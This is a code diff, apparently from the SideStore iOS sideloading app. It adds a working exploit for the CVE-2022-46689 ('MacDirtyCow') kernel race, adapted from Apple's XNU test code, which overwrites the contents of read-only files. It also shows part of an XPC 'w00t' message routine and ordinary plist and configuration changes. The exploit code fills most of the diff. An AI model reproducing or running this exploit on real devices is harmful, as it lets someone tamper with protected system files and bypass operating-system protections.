+  if (err != KERN_SUCCESS) {
+    printf("w00t message send failed: %s\n", mach_error_string(err));
+    return;
+  } else {
+    printf("sent xpc w00t message\n");
+  }
+
+  mach_port_deallocate(mach_task_self(), so0);
+  mach_port_deallocate(mach_task_self(), so1);
+
+  return;
+}

MacDirtyCow/vm_unaligned_copy_switch_race.h

@@ -0,0 +1,20 @@
+//
+//  vm_unaligned_copy_switch_race.h
+//  AltStore
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#ifndef vm_unaligned_copy_switch_race_h
+#define vm_unaligned_copy_switch_race_h
+
+#include <stdlib.h>
+#include <stdbool.h>
+/// Uses CVE-2022-46689 to overwrite `overwrite_length` bytes of `file_to_overwrite` with `overwrite_data`, starting from `file_offset`.
+/// `file_to_overwrite` should be a file descriptor opened with O_RDONLY.
+/// `overwrite_length` must be less than or equal to `PAGE_SIZE`.
+/// Returns `true` if the overwrite succeeded, and `false` if the device is not vulnerable.
+bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length);
+
+#endif /* vm_unaligned_copy_switch_race_h */

MacDirtyCow/vm_unaligned_copy_switch_race.m

@@ -0,0 +1,370 @@
+//
+//  vm_unaligned_copy_switch_race.m
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+// from https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c
+// modified to compile outside of XNU
+
+#include <pthread.h>
+#include <dispatch/dispatch.h>
+#include <stdio.h>
+
+#include <mach/mach_init.h>
+#include <mach/mach_port.h>
+#include <mach/vm_map.h>
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#include "vm_unaligned_copy_switch_race.h"
+
+#define T_QUIET
+#define T_EXPECT_MACH_SUCCESS(a, b)
+#define T_EXPECT_MACH_ERROR(a, b, c)
+#define T_ASSERT_MACH_SUCCESS(a, b, ...)
+#define T_ASSERT_MACH_ERROR(a, b, c)
+#define T_ASSERT_POSIX_SUCCESS(a, b)
+#define T_ASSERT_EQ(a, b, c) do{if ((a) != (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0)
+#define T_ASSERT_NE(a, b, c) do{if ((a) == (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0)
+#define T_ASSERT_TRUE(a, b, ...)
+#define T_LOG(a, ...) fprintf(stderr, a "\n", __VA_ARGS__)
+#define T_DECL(a, b) static void a(void)
+#define T_PASS(a, ...) fprintf(stderr, a "\n", __VA_ARGS__)
+
+struct context1 {
+    vm_size_t obj_size;
+    vm_address_t e0;
+    mach_port_t mem_entry_ro;
+    mach_port_t mem_entry_rw;
+    dispatch_semaphore_t running_sem;
+    pthread_mutex_t mtx;
+    volatile bool done;
+};
+
+static void *
+switcheroo_thread(__unused void *arg)
+{
+    kern_return_t kr;
+    struct context1 *ctx;
+
+    ctx = (struct context1 *)arg;
+    /* tell main thread we're ready to run */
+    dispatch_semaphore_signal(ctx->running_sem);
+    while (!ctx->done) {
+        /* wait for main thread to be done setting things up */
+        pthread_mutex_lock(&ctx->mtx);
+        if (ctx->done) {
+      pthread_mutex_unlock(&ctx->mtx);
+            break;
+        }
+        /* switch e0 to RW mapping */
+        kr = vm_map(mach_task_self(),
+            &ctx->e0,
+            ctx->obj_size,
+            0,         /* mask */
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
+            ctx->mem_entry_rw,
+            0,
+            FALSE,         /* copy */
+            VM_PROT_READ | VM_PROT_WRITE,
+            VM_PROT_READ | VM_PROT_WRITE,
+            VM_INHERIT_DEFAULT);
+        T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RW");
+        /* wait a little bit */
+        usleep(100);
+        /* switch bakc to original RO mapping */
+        kr = vm_map(mach_task_self(),
+            &ctx->e0,
+            ctx->obj_size,
+            0,         /* mask */
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
+            ctx->mem_entry_ro,
+            0,
+            FALSE,         /* copy */
+            VM_PROT_READ,
+            VM_PROT_READ,
+            VM_INHERIT_DEFAULT);
+        T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RO");
+        /* tell main thread we're don switching mappings */
+        pthread_mutex_unlock(&ctx->mtx);
+        usleep(100);
+    }
+    return NULL;
+}
+
+bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length) {
+    bool retval = false;
+    pthread_t th = NULL;
+    int ret;
+    kern_return_t kr;
+    time_t start, duration;
+#if 0
+    mach_msg_type_number_t cow_read_size;
+#endif
+    vm_size_t copied_size;
+    int loops;
+    vm_address_t e2, e5;
+    struct context1 context1, *ctx;
+    int kern_success = 0, kern_protection_failure = 0, kern_other = 0;
+    vm_address_t ro_addr, tmp_addr;
+    memory_object_size_t mo_size;
+
+    ctx = &context1;
+    ctx->obj_size = 256 * 1024;
+
+    void* file_mapped = mmap(NULL, ctx->obj_size, PROT_READ, MAP_SHARED, file_to_overwrite, file_offset);
+    if (file_mapped == MAP_FAILED) {
+        fprintf(stderr, "failed to map\n");
+        return false;
+    }
+    if (!memcmp(file_mapped, overwrite_data, overwrite_length)) {
+        fprintf(stderr, "already the same?\n");
+        munmap(file_mapped, ctx->obj_size);
+        return true;
+    }
+    ro_addr = (vm_address_t)file_mapped;
+
+    ctx->e0 = 0;
+    ctx->running_sem = dispatch_semaphore_create(0);
+    T_QUIET; T_ASSERT_NE(ctx->running_sem, NULL, "dispatch_semaphore_create");
+    ret = pthread_mutex_init(&ctx->mtx, NULL);
+    T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_mutex_init");
+    ctx->done = false;
+    ctx->mem_entry_rw = MACH_PORT_NULL;
+    ctx->mem_entry_ro = MACH_PORT_NULL;
+#if 0
+    /* allocate our attack target memory */
+    kr = vm_allocate(mach_task_self(),
+        &ro_addr,
+        ctx->obj_size,
+        VM_FLAGS_ANYWHERE);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate ro_addr");
+    /* initialize to 'A' */
+    memset((char *)ro_addr, 'A', ctx->obj_size);
+#endif
+
+    /* make it read-only */
+    kr = vm_protect(mach_task_self(),
+        ro_addr,
+        ctx->obj_size,
+        TRUE,             /* set_maximum */
+        VM_PROT_READ);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_protect ro_addr");
+    /* make sure we can't get read-write handle on that target memory */
+    mo_size = ctx->obj_size;
+    kr = mach_make_memory_entry_64(mach_task_self(),
+        &mo_size,
+        ro_addr,
+        MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+        &ctx->mem_entry_ro,
+        MACH_PORT_NULL);
+    T_QUIET; T_ASSERT_MACH_ERROR(kr, KERN_PROTECTION_FAILURE, "make_mem_entry() RO");
+    /* take read-only handle on that target memory */
+    mo_size = ctx->obj_size;
+    kr = mach_make_memory_entry_64(mach_task_self(),
+        &mo_size,
+        ro_addr,
+        MAP_MEM_VM_SHARE | VM_PROT_READ,
+        &ctx->mem_entry_ro,
+        MACH_PORT_NULL);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RO");
+    T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size");
+    /* make sure we can't map target memory as writable */
+    tmp_addr = 0;
+    kr = vm_map(mach_task_self(),
+        &tmp_addr,
+        ctx->obj_size,
+        0,         /* mask */
+        VM_FLAGS_ANYWHERE,
+        ctx->mem_entry_ro,
+        0,
+        FALSE,         /* copy */
+        VM_PROT_READ,
+        VM_PROT_READ | VM_PROT_WRITE,
+        VM_INHERIT_DEFAULT);
+    T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw");
+    tmp_addr = 0;
+    kr = vm_map(mach_task_self(),
+        &tmp_addr,
+        ctx->obj_size,
+        0,         /* mask */
+        VM_FLAGS_ANYWHERE,
+        ctx->mem_entry_ro,
+        0,
+        FALSE,         /* copy */
+        VM_PROT_READ | VM_PROT_WRITE,
+        VM_PROT_READ | VM_PROT_WRITE,
+        VM_INHERIT_DEFAULT);
+    T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw");
+
+    /* allocate a source buffer for the unaligned copy */
+    kr = vm_allocate(mach_task_self(),
+        &e5,
+        ctx->obj_size * 2,
+        VM_FLAGS_ANYWHERE);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e5");
+    /* initialize to 'C' */
+    memset((char *)e5, 'C', ctx->obj_size * 2);
+
+    char* e5_overwrite_ptr = (char*)(e5 + ctx->obj_size - 1);
+    memcpy(e5_overwrite_ptr, overwrite_data, overwrite_length);
+
+    int overwrite_first_diff_offset = -1;
+    char overwrite_first_diff_value = 0;
+    for (int off = 0; off < overwrite_length; off++) {
+        if (((char*)ro_addr)[off] != e5_overwrite_ptr[off]) {
+            overwrite_first_diff_offset = off;
+            overwrite_first_diff_value = ((char*)ro_addr)[off];
+        }
+    }
+    if (overwrite_first_diff_offset == -1) {
+        fprintf(stderr, "no diff?\n");
+        return false;
+    }
+
+    /*
+     * get a handle on some writable memory that will be temporarily
+     * switched with the read-only mapping of our target memory to try
+     * and trick copy_unaligned to write to our read-only target.
+     */
+    tmp_addr = 0;
+    kr = vm_allocate(mach_task_self(),
+        &tmp_addr,
+        ctx->obj_size,
+        VM_FLAGS_ANYWHERE);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate() some rw memory");
+    /* initialize to 'D' */
+    memset((char *)tmp_addr, 'D', ctx->obj_size);
+    /* get a memory entry handle for that RW memory */
+    mo_size = ctx->obj_size;
+    kr = mach_make_memory_entry_64(mach_task_self(),
+        &mo_size,
+        tmp_addr,
+        MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+        &ctx->mem_entry_rw,
+        MACH_PORT_NULL);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RW");
+    T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size");
+    kr = vm_deallocate(mach_task_self(), tmp_addr, ctx->obj_size);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate() tmp_addr 0x%llx", (uint64_t)tmp_addr);
+    tmp_addr = 0;
+
+    pthread_mutex_lock(&ctx->mtx);
+
+    /* start racing thread */
+    ret = pthread_create(&th, NULL, switcheroo_thread, (void *)ctx);
+    T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create");
+
+    /* wait for racing thread to be ready to run */
+    dispatch_semaphore_wait(ctx->running_sem, DISPATCH_TIME_FOREVER);
+
+    duration = 10; /* 10 seconds */
+    T_LOG("Testing for %ld seconds...", duration);
+    for (start = time(NULL), loops = 0;
+        time(NULL) < start + duration;
+        loops++) {
+        /* reserve space for our 2 contiguous allocations */
+        e2 = 0;
+        kr = vm_allocate(mach_task_self(),
+            &e2,
+            2 * ctx->obj_size,
+            VM_FLAGS_ANYWHERE);
+        T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate to reserve e2+e0");
+
+        /* make 1st allocation in our reserved space */
+        kr = vm_allocate(mach_task_self(),
+            &e2,
+            ctx->obj_size,
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(240));
+        T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e2");
+        /* initialize to 'B' */
+        memset((char *)e2, 'B', ctx->obj_size);
+
+        /* map our read-only target memory right after */
+        ctx->e0 = e2 + ctx->obj_size;
+        kr = vm_map(mach_task_self(),
+            &ctx->e0,
+            ctx->obj_size,
+            0,         /* mask */
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(241),
+            ctx->mem_entry_ro,
+            0,
+            FALSE,         /* copy */
+            VM_PROT_READ,
+            VM_PROT_READ,
+            VM_INHERIT_DEFAULT);
+        T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() mem_entry_ro");
+
+        /* let the racing thread go */
+        pthread_mutex_unlock(&ctx->mtx);
+        /* wait a little bit */
+        usleep(100);
+
+        /* trigger copy_unaligned while racing with other thread */
+        kr = vm_read_overwrite(mach_task_self(),
+            e5,
+            ctx->obj_size - 1 + overwrite_length,
+            e2 + 1,
+            &copied_size);
+        T_QUIET;
+        T_ASSERT_TRUE(kr == KERN_SUCCESS || kr == KERN_PROTECTION_FAILURE,
+            "vm_read_overwrite kr %d", kr);
+        switch (kr) {
+        case KERN_SUCCESS:
+            /* the target was RW */
+            kern_success++;
+            break;
+        case KERN_PROTECTION_FAILURE:
+            /* the target was RO */
+            kern_protection_failure++;
+            break;
+        default:
+            /* should not happen */
+            kern_other++;
+            break;
+        }
+        /* check that our read-only memory was not modified */
+#if 0
+        T_QUIET; T_ASSERT_EQ(((char *)ro_addr)[overwrite_first_diff_offset], overwrite_first_diff_value, "RO mapping was modified");
+#endif
+        bool is_still_equal = ((char *)ro_addr)[overwrite_first_diff_offset] == overwrite_first_diff_value;
+
+        /* tell racing thread to stop toggling mappings */
+        pthread_mutex_lock(&ctx->mtx);
+
+        /* clean up before next loop */
+        vm_deallocate(mach_task_self(), ctx->e0, ctx->obj_size);
+        ctx->e0 = 0;
+        vm_deallocate(mach_task_self(), e2, ctx->obj_size);
+        e2 = 0;
+        if (!is_still_equal) {
+            retval = true;
+            fprintf(stderr, "RO mapping was modified\n");
+            break;
+        }
+    }
+
+    ctx->done = true;
+    pthread_mutex_unlock(&ctx->mtx);
+    pthread_join(th, NULL);
+
+    kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_rw);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_rw)");
+    kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_ro);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_ro)");
+    kr = vm_deallocate(mach_task_self(), ro_addr, ctx->obj_size);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(ro_addr)");
+    kr = vm_deallocate(mach_task_self(), e5, ctx->obj_size * 2);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(e5)");
+
+#if 0
+    T_LOG("vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d",
+        kern_success, kern_protection_failure, kern_other);
+    T_PASS("Ran %d times in %ld seconds with no failure", loops, duration);
+#endif
+    return retval;
+}

Shared/Extensions/Bundle+AltStore.swift

@@ -56,7 +56,7 @@ public extension Bundle
 public extension Bundle
 {
     static var baseAltStoreAppGroupID = "group." + Bundle.Info.appbundleIdentifier
-    
+
     var appGroups: [String] {
         return self.infoDictionary?[Bundle.Info.appGroups] as? [String] ?? []
     }

SideStore copy-Info.plist

@@ -0,0 +1,212 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>ALTAnisetteURL</key>
+	<string>https://ani.sidestore.io</string>
+	<key>ALTAppGroups</key>
+	<array>
+		<string>group.$(APP_GROUP_IDENTIFIER)</string>
+		<string>group.com.SideStore.SideStore</string>
+	</array>
+	<key>ALTDeviceID</key>
+	<string>00008101-000129D63698001E</string>
+	<key>ALTPairingFile</key>
+	<string>&lt;insert pairing file here&gt;</string>
+	<key>ALTServerID</key>
+	<string>1F7D5B55-79CE-4546-A029-D4DDC4AF3B6D</string>
+	<key>CFBundleDevelopmentRegion</key>
+	<string>$(DEVELOPMENT_LANGUAGE)</string>
+	<key>CFBundleDocumentTypes</key>
+	<array>
+		<dict>
+			<key>CFBundleTypeIconFiles</key>
+			<array/>
+			<key>CFBundleTypeName</key>
+			<string>iOS App</string>
+			<key>CFBundleTypeRole</key>
+			<string>Viewer</string>
+			<key>LSHandlerRank</key>
+			<string>Alternate</string>
+			<key>LSItemContentTypes</key>
+			<array>
+				<string>com.apple.itunes.ipa</string>
+			</array>
+		</dict>
+	</array>
+	<key>CFBundleExecutable</key>
+	<string>$(EXECUTABLE_NAME)</string>
+	<key>CFBundleIdentifier</key>
+	<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
+	<key>CFBundleInfoDictionaryVersion</key>
+	<string>6.0</string>
+	<key>CFBundleName</key>
+	<string>$(PRODUCT_NAME)</string>
+	<key>CFBundlePackageType</key>
+	<string>APPL</string>
+	<key>CFBundleShortVersionString</key>
+	<string>$(MARKETING_VERSION)</string>
+	<key>CFBundleURLTypes</key>
+	<array>
+		<dict>
+			<key>CFBundleTypeRole</key>
+			<string>Editor</string>
+			<key>CFBundleURLName</key>
+			<string>AltStore General</string>
+			<key>CFBundleURLSchemes</key>
+			<array>
+				<string>altstore</string>
+				<string>sidestore</string>
+			</array>
+		</dict>
+		<dict>
+			<key>CFBundleTypeRole</key>
+			<string>Editor</string>
+			<key>CFBundleURLName</key>
+			<string>AltStore Backup</string>
+			<key>CFBundleURLSchemes</key>
+			<array>
+				<string>altstore-com.rileytestut.AltStore</string>
+				<string>sidestore-com.SideStore.SideStore</string>
+			</array>
+		</dict>
+	</array>
+	<key>CFBundleVersion</key>
+	<string>1</string>
+	<key>INIntentsSupported</key>
+	<array>
+		<string>RefreshAllIntent</string>
+		<string>ViewAppIntent</string>
+	</array>
+	<key>LSApplicationQueriesSchemes</key>
+	<array>
+		<string>altstore-com.rileytestut.AltStore</string>
+		<string>altstore-com.rileytestut.AltStore.Beta</string>
+		<string>altstore-com.rileytestut.Delta</string>
+		<string>altstore-com.rileytestut.Delta.Beta</string>
+		<string>altstore-com.rileytestut.Delta.Lite</string>
+		<string>altstore-com.rileytestut.Delta.Lite.Beta</string>
+		<string>altstore-com.rileytestut.Clip</string>
+		<string>altstore-com.rileytestut.Clip.Beta</string>
+	</array>
+	<key>LSRequiresIPhoneOS</key>
+	<true/>
+	<key>LSSupportsOpeningDocumentsInPlace</key>
+	<true/>
+	<key>NSAppTransportSecurity</key>
+	<dict>
+		<key>NSAllowsArbitraryLoads</key>
+		<true/>
+	</dict>
+	<key>NSAppleMusicUsageDescription</key>
+	<string>SideStore needs this for MacDirtyCow</string>
+	<key>NSBonjourServices</key>
+	<array>
+		<string>_altserver._tcp</string>
+	</array>
+	<key>NSLocalNetworkUsageDescription</key>
+	<string>SideStore uses the local network to find and communicate with your device.</string>
+	<key>NSUserActivityTypes</key>
+	<array>
+		<string>RefreshAllIntent</string>
+		<string>ViewAppIntent</string>
+	</array>
+	<key>UIApplicationSceneManifest</key>
+	<dict>
+		<key>UIApplicationSupportsMultipleScenes</key>
+		<true/>
+		<key>UISceneConfigurations</key>
+		<dict>
+			<key>UIWindowSceneSessionRoleApplication</key>
+			<array>
+				<dict>
+					<key>UILaunchStoryboardName</key>
+					<string>LaunchScreen</string>
+					<key>UISceneConfigurationName</key>
+					<string>Default Configuration</string>
+					<key>UISceneDelegateClassName</key>
+					<string>$(PRODUCT_MODULE_NAME).SceneDelegate</string>
+					<key>UISceneStoryboardFile</key>
+					<string>Main</string>
+				</dict>
+			</array>
+		</dict>
+	</dict>
+	<key>UIBackgroundModes</key>
+	<array>
+		<string>audio</string>
+		<string>fetch</string>
+		<string>remote-notification</string>
+	</array>
+	<key>UIFileSharingEnabled</key>
+	<true/>
+	<key>UILaunchStoryboardName</key>
+	<string>LaunchScreen</string>
+	<key>UIMainStoryboardFile</key>
+	<string>Main</string>
+	<key>UIRequiredDeviceCapabilities</key>
+	<array>
+		<string>armv7</string>
+	</array>
+	<key>UIStatusBarTintParameters</key>
+	<dict>
+		<key>UINavigationBar</key>
+		<dict>
+			<key>Style</key>
+			<string>UIBarStyleDefault</string>
+			<key>Translucent</key>
+			<false/>
+		</dict>
+	</dict>
+	<key>UISupportedInterfaceOrientations</key>
+	<array>
+		<string>UIInterfaceOrientationPortrait</string>
+	</array>
+	<key>UISupportedInterfaceOrientations~ipad</key>
+	<array>
+		<string>UIInterfaceOrientationPortrait</string>
+		<string>UIInterfaceOrientationPortraitUpsideDown</string>
+		<string>UIInterfaceOrientationLandscapeLeft</string>
+		<string>UIInterfaceOrientationLandscapeRight</string>
+	</array>
+	<key>UTImportedTypeDeclarations</key>
+	<array>
+		<dict>
+			<key>UTTypeConformsTo</key>
+			<array>
+				<string>public.data</string>
+			</array>
+			<key>UTTypeDescription</key>
+			<string>iOS App</string>
+			<key>UTTypeIconFiles</key>
+			<array/>
+			<key>UTTypeIdentifier</key>
+			<string>com.apple.itunes.ipa</string>
+			<key>UTTypeTagSpecification</key>
+			<dict>
+				<key>public.filename-extension</key>
+				<string>ipa</string>
+			</dict>
+		</dict>
+		<dict>
+			<key>UTTypeConformsTo</key>
+			<array>
+				<string>com.apple.plist</string>
+			</array>
+			<key>UTTypeDescription</key>
+			<string>Mobile Device Pairing</string>
+			<key>UTTypeIconFiles</key>
+			<array/>
+			<key>UTTypeIdentifier</key>
+			<string>org.sidestore.mobiledevicepairing</string>
+			<key>UTTypeTagSpecification</key>
+			<dict>
+				<key>public.filename-extension</key>
+				<array>
+					<string>mobiledevicepairing</string>
+				</array>
+			</dict>
+		</dict>
+	</array>
+</dict>
+</plist>

trustedapps.json

@@ -24,10 +24,6 @@
       "identifier": "com.flyinghead.source",
       "sourceURL": "https://flyinghead.github.io/flycast-builds/altstore.json"
     },
-    {
-      "identifier": "com.emuplace.altstore",
-      "sourceURL": "https://emuplace.app/altstore.json"
-    },
     {
       "identifier": "dev.crystall1ne.repos.PojavLauncher",
       "sourceURL": "https://alt.crystall1ne.dev"
@@ -46,7 +42,7 @@
     },
     {
       "identifier": "com.litritt.litsource",
-      "sourceURL": "https://apps.litritt.com/"
+      "sourceURL": "https://altstore.ignitedemulator.com/"
     }
   ]
 }